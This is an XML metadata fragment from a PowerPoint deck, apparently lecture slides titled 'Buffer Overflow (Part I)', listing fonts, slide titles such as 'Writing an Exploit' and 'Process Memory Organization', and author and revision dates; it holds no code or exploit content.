      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>mystyle</vt:lpstr>
      <vt:lpstr>WordPad Document</vt:lpstr>
      <vt:lpstr>Wordpad Document</vt:lpstr>
      <vt:lpstr>Buffer Overflow (Part I)</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Process Memory Organization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Buffer Overflows</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>What is the trick?</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Writing an Exploit</vt:lpstr>
      <vt:lpstr>Exploit2</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Exploit3</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Exploit4</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</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Buffer Overflow (Part I)</dc:title>
  <cp:lastModifiedBy>XU, Xuehan</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2001-10-16T08:18:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-23T05:08:44Z</dcterms:modified>
</cp:coreProperties>
</file>